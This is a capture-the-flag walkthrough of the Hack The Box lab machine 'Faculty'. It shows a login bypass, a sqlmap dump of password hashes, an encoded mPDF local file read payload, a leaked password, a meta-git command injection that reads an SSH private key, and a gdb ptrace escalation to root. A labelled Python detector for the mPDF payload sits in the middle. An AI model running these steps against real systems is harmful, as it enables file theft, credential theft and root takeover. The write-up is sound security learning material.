Faculty - HTB - Key Points

Target's IP: 10.10.11.169


PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

http-title: Did not follow redirect to http://faculty.htb

The JavaScript on the login page suggests that, if you intercept the response and change the 3 to a 1, you can bypass the login.

sqlmap -u 'http://faculty.htb/view_schedule.php?id=1' -T users --dump

Administrator | 1    | 1fecbe762af147c1176a0fc2c722a345 | admin

Generating PDFs as an authenticated user, you can see that the tool used to create the files is mPDF, which is subject to an LFI vulnerability:
<h1>ciao</h1><annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
which, when properly encoded, needs to be supplied as follows:
JTI1M0NoMSUyNTNFY2lhbyUyNTNDL2gxJTI1M0UlMjUzQ2Fubm90YXRpb24lMjUyMGZpbGU9JTI1MjIvZXRjL3Bhc3N3ZCUyNTIyJTI1MjBjb250ZW50PSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwaWNvbj0lMjUyMkdyYXBoJTI1MjIlMjUyMHRpdGxlPSUyNTIyQXR0YWNoZWQlMjUyMEZpbGU6JTI1MjAvZXRjL3Bhc3N3ZCUyNTIyJTI1MjBwb3MteD0lMjUyMjE5NSUyNTIyJTI1MjAvJTI1M0U=

gbyolo:x:1000:1000:gbyolo:/home/gbyolo:/bin/bash
developer:x:1001:1002:,,,:/home/developer:/bin/bash
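An added detection check, not part of the write-up or the box: it peels off the encoding layers the payload above uses (base64, then repeated URL-encoding) and flags an mPDF annotation tag that carries a file= attribute, which is what turns a PDF export into a file read. The sample HTML is the payload from this write-up; the benign sample and the helper names are constructed for the example.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

# mPDF <annotation ... file="..."> element, the primitive behind the file read above
ANNOTATION_FILE_RE = re.compile(r'<\s*annotation\b[^>]*\bfile\s*=', re.IGNORECASE)


def normalize(payload: str, max_rounds: int = 5) -> str:
    """Undo the wrapping seen in the write-up: an optional base64 layer,
    then as many URL-encoding layers as are present (bounded by max_rounds)."""
    text = payload.strip()
    try:
        decoded = base64.b64decode(text, validate=True).decode("utf-8")
        if decoded.isprintable():
            text = decoded
    except (binascii.Error, UnicodeDecodeError):
        pass  # not base64 (e.g. raw HTML or a %-encoded string): keep as-is
    for _ in range(max_rounds):
        unquoted = unquote(text)
        if unquoted == text:
            break  # no more %XX escapes left to decode
        text = unquoted
    return text


def contains_file_annotation(payload: str) -> bool:
    """True if the decoded payload contains an annotation tag that reads a file."""
    return bool(ANNOTATION_FILE_RE.search(normalize(payload)))


# Sample from the write-up, and a benign heading for comparison (constructed)
SAMPLE_HTML = ('<h1>ciao</h1><annotation file="/etc/passwd" content="/etc/passwd" '
               'icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />')
BENIGN_HTML = "<h1>hello</h1>"


def wrap(html: str) -> str:
    """Encode the way the payload above is encoded: URL-encode twice, then base64."""
    double_encoded = quote(quote(html, safe=""), safe="")
    return base64.b64encode(double_encoded.encode()).decode()


SAMPLE_ENCODED = wrap(SAMPLE_HTML)
BENIGN_ENCODED = wrap(BENIGN_HTML)

if __name__ == "__main__":
    for name, p in (("sample", SAMPLE_ENCODED), ("benign", BENIGN_ENCODED)):
        print(name, "flagged" if contains_file_annotation(p) else "clean")
```

This only flags attempts; the durable fix is not to hand user-controlled HTML to mPDF at all.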


Using the same exploit to read the PHP files of the web server, we find out that the file used to connect to the database contains a password:
Co.met06aci.dly53ro.per

It turns out to be gbyolo's password, so we can log into the box over SSH.

gbyolo can run meta-git as the developer user. A quick search turns up an easy exploit that gives us command execution as developer, like this:
sudo -u developer /usr/local/bin/meta-git clone 'tmp||cat /home/developer/.ssh/idrsa'


developer@faculty:~$ cat user.txt 
0b...8a


Checking for binary capabilities, gdb has the cap_sys_ptrace capability, which allows us to attach to processes running as root. There is a Python process running as root; if we attach to it we can call system() and execute commands as root.

(gdb) call (void)system("ls")
[Detaching after vfork from child process 62096]
(gdb) call (void)system("chmod +s /bin/bash")
[Detaching after vfork from child process 62111]
(gdb) quit
A debugging session is active.
        Inferior 1 [process 725] will be detached.
Quit anyway? (y or n) y
Detaching from program: /usr/bin/python3.8, process 725
[Inferior 1 (process 725) detached]
developer@faculty:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash
developer@faculty:~$ /bin/bash -p
bash-5.0# cd /root
bash-5.0# cat root.txt 
7b...6e
Merry hacking ;)

